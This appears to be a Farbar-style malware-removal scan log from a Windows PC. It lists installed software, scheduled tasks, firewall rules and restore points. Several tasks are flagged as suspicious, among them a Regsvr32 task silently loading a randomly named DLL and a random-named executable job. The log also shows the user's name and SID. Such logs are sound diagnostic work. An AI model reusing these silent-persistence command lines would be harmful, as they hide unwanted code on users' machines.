Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Access database engine 2007 (English) (HKLM-x32\...\{90120000-00D1-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Click-to-Run 2010 (HKLM-x32\...\Office14.Click2Run) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Starter 2010 - English (HKLM-x32\...\{90140011-0066-0409-0000-0000000FF1CE}) (Version: 14.0.5139.5005 - Microsoft Corporation)
Microsoft Office Word Viewer 2003 (HKLM-x32\...\{90850409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2783097096-289569773-1546617986-1001\...\OneDriveSetup.exe) (Version: 17.3.6743.1212 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Streets & Trips 2009 (HKLM-x32\...\{C82185E8-C27B-4EF4-2009-4444BC2C2B6D}) (Version: 16.0.18.1000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.30319 (HKLM\...\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319 (HKLM-x32\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation)
Mozilla Firefox 27.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 27.0 (x86 en-US)) (Version: 27.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 27.0 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
OpenOffice 4.1.1 (HKLM-x32\...\{9395F41D-0F80-432E-9A59-B8E477E7E163}) (Version: 4.11.9775 - Apache Software Foundation)
opensource (x32 Version: 1.0.14960.3876 - Your Company Name) Hidden
PdaNet+ for Android 4.12 (HKLM-x32\...\PdaNet_is1) (Version: - June Fabrics Technology Inc)
PlayReady PC Runtime x86 (HKLM-x32\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
PowerFingers Ch. 1 (HKLM-x32\...\PowerFingers Ch. 1) (Version: - Music Unlimited Inc.)
PrintMaster 12 (HKLM-x32\...\{2A304FDE-F4E3-446D-AA0D-31425C897B71}) (Version: - Broderbund LLC)
Product Improvement Study for HP Deskjet 1510 series (HKLM\...\{35DB2630-846E-47C5-AF84-9D6AC3629F55}) (Version: 32.2.188.47710 - Hewlett-Packard Co.)
Quicken 2014 (HKLM-x32\...\{0877F595-254F-45F4-991D-3F72E86B17CE}) (Version: 23.1.7.6 - Intuit)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.48.823.2011 - Realtek)
Realtek PCIE Card Reader (HKLM-x32\...\{C1594429-8296-4652-BF54-9DBE4932A44C}) (Version: 6.1.7601.29004 - Realtek Semiconductor Corp.)
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
SlimCleaner Plus (HKLM\...\SlimCleaner Plus) (Version: 2.5.8 - Slimware Utilities Holdings, Inc.)
SpeedyBackup (HKLM-x32\...\{6FF10046-D763-4859-A5C7-8AD81B9C8427}) (Version: 5.0.5.0 - SpeedyPC Software)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.12.98 - Synaptics Incorporated)
Turbo Lister 2 (HKLM-x32\...\{8927E07C-97F7-4A54-88FB-D976F50DD46E}) (Version: 2.00.0000 - eBay Inc.)
WinALDL (HKLM-x32\...\WinALDL) (Version: - )
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3538.0513 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {02838A17-EB1E-41DC-A610-4FACFC9CFC90} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> No File <==== ATTENTION
Task: {05DF4A16-BE01-4E34-A027-CB8165CA61E8} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => %SystemRoot%\ehome\ehPrivJob.exe
Task: {085C37EA-1E33-4C9E-87B8-3E576F3FE4AB} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {0B0B1AAD-0AF0-4618-BDEF-CDDEDF582AD0} - System32\Tasks\JZIP => C:\Program Files (x86)\JZIP\JZIP\JZIP.exe <==== ATTENTION
Task: {0CBCDC29-56A3-4015-A06E-8FD4AABD553B} - \SmartWeb Upgrade Trigger Task -> No File <==== ATTENTION
Task: {0EBA43D3-D7BE-4AE6-9462-F46D199BCC46} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => %SystemRoot%\ehome\mcupdate.exe
Task: {1E0973D5-7653-49B7-B013-63DB348A9012} - \ShopperProJSUpd -> No File <==== ATTENTION
Task: {1EAE785B-1358-435B-86E7-5860D0FEE3D6} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {207BFC61-FFED-4507-8EDD-6AA5AE1C8A47} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => %SystemRoot%\ehome\ehPrivJob.exe
Task: {2256FEB8-E941-4264-AD41-D3DD3B8E85D1} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\MpCmdRun.exe
Task: {2391AF7C-19CC-4AED-9222-E7E2F5CF9B9F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-03] (Google Inc.)
Task: {24625A46-03C1-4745-AFC8-58F70A4CA83B} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => %SystemRoot%\ehome\ehPrivJob.exe
Task: {2865D75A-9EFF-4BDA-A98B-E2BAFD745E88} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => %SystemRoot%\ehome\ehrec.exe
Task: {2A9BA1F7-EAEA-4938-9457-630770B8CA56} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => %windir%\ehome\MCUpdate.exe
Task: {2C627394-07F4-4001-84C6-96DA554AC5A0} - \IBUpd -> No File <==== ATTENTION
Task: {2F0B453C-7978-474F-B2DD-511436B54629} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
Task: {35D93F14-F697-4D00-9872-F3A2EE485306} - System32\Tasks\Beach Kit => Rundll32.exe "C:\Users\Randy\AppData\Local\Beach Kit\{B29DDEDA-90AD-4218-7C20-9BC475FF709E}\BeachKit.dll",#3
Task: {39E77F7F-3017-488D-B44D-3D34D66F423B} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPSFMessenger\HPSFMsgr.exe [2011-09-09] (Hewlett-Packard Company)
Task: {4141D743-61D5-4790-8B3F-9B77C8B78A87} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => %SystemRoot%\ehome\ehPrivJob.exe
Task: {477A9893-3F9C-40B5-ADA0-FC96EE6735EC} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {49E80698-374B-426E-BD1D-E0ECDA6BD4A4} - \SwiftSearch Auto Updater 1.10.0.25 Core -> No File <==== ATTENTION
Task: {4CD1D841-791C-485F-9229-FDD5EE9C27CF} - System32\Tasks\SpeedyBackup reigistration schedule startup => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\SpeedyBackup.exe <==== ATTENTION
Task: {4D2E3B92-6CEE-4C6C-82C1-BF7C4B59FE7E} - \systemmgr -> No File <==== ATTENTION
Task: {4DB10E48-560F-4E83-A1B5-16CEB0A07A99} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
Task: {52CD9B93-F461-41BB-B4D3-375417CBE947} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => %SystemRoot%\ehome\mcupdate.exe
Task: {5840CBCE-7F77-411E-B033-1C1AF189ADB5} - \1f308483-1a6e-493d-ae8f-5dd8634c5004-4 -> No File <==== ATTENTION
Task: {5888B29F-A4A4-4A01-83F0-070CAD86847C} - System32\Tasks\SpeedyPC Update Version3 Startup Task => C:\Program Files (x86)\Common Files\SpeedyPC Software\UUS3\SpeedyPC_Update3.exe <==== ATTENTION
Task: {58BFE8A7-F663-453E-8A1F-E93845F9ED7B} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => %SystemRoot%\ehome\ehPrivJob.exe
Task: {69480AF7-F603-4EA8-8F93-EA6B8C01E138} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {695CE9AD-D705-4749-BE09-14AD8276A181} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
Task: {69872E59-9BA5-40D1-B0BE-ACAFDCCEA4B4} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-03] (Google Inc.)
Task: {69960CBC-066B-492F-92D0-642850A25C91} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => %SystemRoot%\ehome\ehrec.exe
Task: {766E1EC9-58D6-40FB-BAC5-6BD45B994FC5} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {7AA2534A-D974-4476-811A-C42210045BF5} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => %SystemRoot%\ehome\ehPrivJob.exe
Task: {7C7A4D0B-9DDE-4325-B5C5-1EF7F85C990C} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => %SystemRoot%\ehome\ehPrivJob.exe
Task: {7F064198-2C66-4EA3-8B38-FFFCD6574F3C} - System32\Tasks\HPCustParticipation HP Deskjet 1510 series => C:\Program Files\HP\HP Deskjet 1510 series\Bin\HPCustPartic.exe [2014-03-06] (Hewlett-Packard Co.)
Task: {8152AE6D-A0D3-41F0-8EEF-5C1CEBACE194} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => %SystemRoot%\ehome\ehPrivJob.exe
Task: {84780F38-B4EB-43A1-9629-5DCE4E9AB282} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => %SystemRoot%\ehome\mcupdate.exe
Task: {86B70693-6EF6-4BC0-B4E4-2BAFCFC8A380} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => %SystemRoot%\ehome\ehPrivJob.exe
Task: {886B215D-DE34-41B6-9B36-980D6CD813DA} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => %SystemRoot%\ehome\ehPrivJob.exe
Task: {89FF84C6-2FF3-4ADC-9311-2162837E1C22} - \Microsoft\Windows\Setup\GWXTriggers\Logon-URT -> No File <==== ATTENTION
Task: {934CAF6C-AD19-40B5-8ACE-AC40D21BBF28} - System32\Tasks\{0532BE32-87D9-B0CA-75BD-6DEE5839A94C} => Regsvr32.exe /s /n /I:"/rt" "C:\PROGRA~3\261dc3b1\57c348f3.dll" <==== ATTENTION
Task: {9C4D00C3-36F0-4AD8-AA88-D81BD96CB286} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => %SystemRoot%\ehome\ehPrivJob.exe
Task: {A433E40E-B066-4216-A8FB-2E412069CE29} - System32\Tasks\SpeedyBackup Startup => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\SpeedyBackup.exe <==== ATTENTION
Task: {B1619F2B-5CE9-4EC5-A3E5-FD048FF487E4} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {B6996A21-76AB-416B-AA92-28E5F3BE2033} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2011-09-09] (Hewlett-Packard Company)
Task: {B7731159-01AA-4BAF-8508-D5D744AB61D2} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> No File <==== ATTENTION
Task: {B7F72EBE-9D32-4E20-BDB1-4619D96DE4F3} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater\HPSFUpdater.exe [2011-06-14] (Hewlett-Packard)
Task: {C6518B78-A01B-4FE6-8AF0-38C0BBF48E58} - \SwiftSearch Auto Updater 1.10.0.25 Pending Update -> No File <==== ATTENTION
Task: {CA12805D-100F-4DA6-A1C6-C1596CB06EFB} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Total Care Tune-Up => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPTuneUp.exe [2011-03-22] (Hewlett-Packard Company)
Task: {CDA7EB4B-1611-4B3F-9BA4-65E0A908AFBC} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Tuneup => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2011-09-09] (Hewlett-Packard Company)
Task: {D56D93D7-2643-4711-BC5B-EC4D1D134106} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-12-17] (Adobe Systems Incorporated)
Task: {D6F2BC1F-773E-4624-9FAA-578BE389CD0E} - System32\Tasks\SpeedyBackup reigistration schedule => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\SpeedyBackup.exe <==== ATTENTION
Task: {E1DEA695-EE7F-4FB6-A4F0-EB278B1FD47B} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {E6542D06-DBEF-4690-A07E-F59316EEB423} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {E67B64B5-D8A4-4EEC-A056-719D3EC8D454} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => %SystemRoot%\ehome\ehPrivJob.exe
Task: {E6FB393C-54B6-49CD-B343-6854CCC2D2D9} - System32\Tasks\{675E60C1-E04C-4593-80CC-CB005468CE68} => pcalua.exe -a "C:\Program Files (x86)\JZIP\JZIP\Uninstall.exe"
Task: {E730974E-3C79-4045-9280-75EA6B86045D} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
Task: {F2EF1CA8-784E-427A-A1D4-97AEB2EB4A85} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {FA4F0A0E-8234-469C-B0EB-2375D63F521A} - \Inst_Rep -> No File <==== ATTENTION
Task: {FAD76473-D2B8-4544-ACE9-4593FE1CB480} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => %SystemRoot%\ehome\ehPrivJob.exe
Task: {FB5B3AE1-116E-45A5-A278-B866156DEE5F} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-01-20] (Adobe Systems Incorporated)
Task: {FFCE8EEA-7117-44A9-8BD4-0C6EA5CEE61E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\NNKcNIsK9b1hl0VgyglYTRwSD.job => C:\Users\Randy\AppData\Roaming\NNKcNIsK9b1hl0VgyglYTRwSD.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\SpeedyBackup reigistration schedule startup.job => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\SpeedyBackup.exe
Task: C:\WINDOWS\Tasks\SpeedyBackup reigistration schedule.job => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\SpeedyBackup.exe
Task: C:\WINDOWS\Tasks\SpeedyBackup Startup.job => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\SpeedyBackup.exe
Task: C:\WINDOWS\Tasks\SpeedyPC Update Version3 Startup Task.job => C:\Program Files (x86)\Common Files\SpeedyPC Software\UUS3\SpeedyPC_Update3.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2015-10-29 23:18 - 2015-10-29 23:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2012-02-10 00:01 - 2012-02-10 00:01 - 00073728 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Container.Wlan.dll
2016-07-21 08:33 - 2016-06-30 20:48 - 02656408 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-07-21 08:33 - 2016-06-30 20:48 - 02656408 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-04-25 20:47 - 2016-04-25 20:53 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2016-07-21 08:34 - 2016-06-30 19:27 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-07-21 08:34 - 2016-06-30 19:21 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-07-21 08:34 - 2016-06-30 19:22 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-07-21 08:34 - 2016-06-30 19:24 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-02-02 09:45 - 2016-02-02 09:45 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-07-21 08:38 - 2016-06-30 19:48 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-05-06 14:05 - 2016-05-06 14:05 - 00093344 _____ () C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupServicePS.dll
2016-04-25 20:47 - 2016-04-25 20:53 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll
2017-02-10 21:59 - 2017-02-01 01:01 - 01870168 _____ () C:\Program Files (x86)\Google\Chrome\Application\56.0.2924.87\libglesv2.dll
2017-02-10 21:59 - 2017-02-01 01:01 - 00085848 _____ () C:\Program Files (x86)\Google\Chrome\Application\56.0.2924.87\libegl.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\...\driversupport.com -> hxxp://apps.driversupport.com
IE trusted site: HKU\S-1-5-21-2783097096-289569773-1546617986-1001\...\driversupport.com -> hxxps://apps.driversupport.com

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 18:34 - 2016-02-29 07:25 - 00000768 ____A C:\WINDOWS\system32\Drivers\etc\hosts

127.0.0.1 localhost

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Randy\Pictures\2013-11-11 mp3 pics\mp3 pics 094.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => LPort=139
FirewallRules: [MSMQ-In-TCP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => LPort=808
FirewallRules: [{5096E3C2-805A-4E88-A4A3-13545B4D1190}] => C:\Program Files (x86)\Common Files\AOL\System Information\sinf.exe
FirewallRules: [{4A38DA32-F01E-4E5A-BF43-C33E19F602A9}] => C:\Program Files (x86)\Common Files\AOL\System Information\sinf.exe
FirewallRules: [{72B049A4-A1AD-424F-B207-83EB45FE4FA1}] => C:\Program Files (x86)\Common Files\AOL\Loader\aolload.exe
FirewallRules: [{C0694437-3E6B-48E6-BAE8-1DD7754607E2}] => C:\Program Files (x86)\Common Files\AOL\Loader\aolload.exe
FirewallRules: [{8C5854C9-2B87-484B-A7CE-DF5FD39FD80F}] => C:\Program Files (x86)\Common Files\AOL\TopSpeed\3.0\aoltpsd3.exe
FirewallRules: [{C1910A3B-1FF1-4A15-BD5C-7B63E54864BA}] => C:\Program Files (x86)\Common Files\AOL\TopSpeed\3.0\aoltpsd3.exe
FirewallRules: [{25AC17DB-848F-4C5B-BFA1-EE136038C5B0}] => C:\Program Files (x86)\AOL Desktop 9.8.2\waol.exe
FirewallRules: [{D82713E1-5DF2-4A9C-89ED-CD6BC635029B}] => C:\Program Files (x86)\AOL Desktop 9.8.2\waol.exe
FirewallRules: [{05C38E86-D970-43B3-B9E5-CE335017994D}] => C:\Program Files (x86)\Common Files\AOL\1454013173\ee\aolsoftware.exe
FirewallRules: [{B9E57A2A-6FD0-4298-9FDD-48B32A87D5C4}] => C:\Program Files (x86)\Common Files\AOL\1454013173\ee\aolsoftware.exe
FirewallRules: [{AF46B9A0-0569-45DA-B9B7-D8C3BCA025FE}] => C:\Program Files (x86)\Common Files\AOL\acs\AOLacsd.exe
FirewallRules: [{9A79DE3D-535B-4630-B408-156475E34583}] => C:\Program Files (x86)\Common Files\AOL\acs\AOLacsd.exe
FirewallRules: [{EB084F55-B942-4682-88DB-6148A03F24A3}] => C:\Program Files (x86)\Common Files\AOL\acs\AOLDial.exe
FirewallRules: [{4B5A63AD-E187-4258-B0D6-7F9854C34707}] => C:\Program Files (x86)\Common Files\AOL\acs\AOLDial.exe
FirewallRules: [UDP Query User{74C217E7-4A71-4B7C-B1C0-7F4F2A476D6F}C:\program files (x86)\premieropinion\pmropn.exe] => C:\program files (x86)\premieropinion\pmropn.exe
FirewallRules: [TCP Query User{51F0DA7E-9ACF-4E1F-AAFE-1D8E388182E7}C:\program files (x86)\premieropinion\pmropn.exe] => C:\program files (x86)\premieropinion\pmropn.exe
FirewallRules: [{0A265467-EB47-4D4F-B21E-557F71FBC74D}] => C:\Program Files\HP\HP OfficeJet 3830 series\Bin\HPNetworkCommunicatorCom.exe
FirewallRules: [{4B048853-1439-4C34-B69F-4F94735906B0}] => LPort=5357
FirewallRules: [{C48CB5AF-96E1-4714-989C-D63918A32561}] => C:\Program Files\HP\HP OfficeJet 3830 series\Bin\DeviceSetup.exe
FirewallRules: [{BB94FFB5-0DF3-484E-B388-3E742A7E3942}] => C:\Program Files\HP\HP OfficeJet 3830 series\bin\FaxPrinterUtility.exe
FirewallRules: [{8D8EA2DE-6C99-4A3D-A12D-12AE07960DA2}] => C:\Program Files\HP\HP OfficeJet 3830 series\bin\SendAFax.exe
FirewallRules: [{5FFB78F9-B102-4DA7-9620-3B31FB3D23BE}] => C:\Program Files\HP\HP OfficeJet 3830 series\bin\DigitalWizards.exe
FirewallRules: [{EEF9F1BC-D009-4B39-9345-8ABECDD897A8}] => C:\Program Files\HP\HP OfficeJet 3830 series\bin\FaxApplications.exe
FirewallRules: [{F65943E6-3AF8-4E73-A7B3-0B0E5F88AA10}] => C:\Users\Randy\AppData\Local\Temp\7zS377E\HP.EasyStart.exe
FirewallRules: [{CE668E86-3CBC-4A89-B046-A191EFF34DD8}] => C:\Windows\system32\rundll32.exe
FirewallRules: [UDP Query User{EE1005F2-20B4-4EFC-B3FE-C75EFC07FF0A}C:\program files (x86)\internet explorer\iexplore.exe] => C:\program files (x86)\internet explorer\iexplore.exe
FirewallRules: [TCP Query User{8CC323F6-7013-42FF-8CCD-45648B4D4B69}C:\program files (x86)\internet explorer\iexplore.exe] => C:\program files (x86)\internet explorer\iexplore.exe
FirewallRules: [{2DFAFEAB-B453-4575-9717-0A2B673A57B5}] => C:\Program Files\HP\HP Deskjet 1510 series\Bin\HPNetworkCommunicatorCom.exe
FirewallRules: [{2A79706E-F012-45D5-BE8E-0AFE79CA93C5}] => C:\Program Files\HP\HP Deskjet 1510 series\Bin\USBSetup.exe
FirewallRules: [{B7892689-DB82-4260-92E6-93E162A44F5E}] => C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{96A65B45-9398-4660-8E2F-AB4CE5ACDF84}] => C:\Users\Randy\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [{5D1CEFBA-B681-47A8-ADE4-DDD97410D510}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

08-08-2016 22:31:58 RegCure Pro Backup
12-11-2016 19:33:46 Windows Update
12-11-2016 19:35:27 Windows Update
11-02-2017 14:46:35 Removed Itibiti RTC

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (02/11/2017 06:34:42 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: ShellExperienceHost.exe, version: 10.0.10586.494, time stamp: 0x5775e94c
Faulting module name: StartUI.dll, version: 10.0.10586.494, time stamp: 0x5775e851
Exception code: 0xc000041d
Fault offset: 0x00000000002990c8
Faulting process id: 0x164c
Faulting application start time: 0x01d284d68cb9af7b
Faulting application path: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
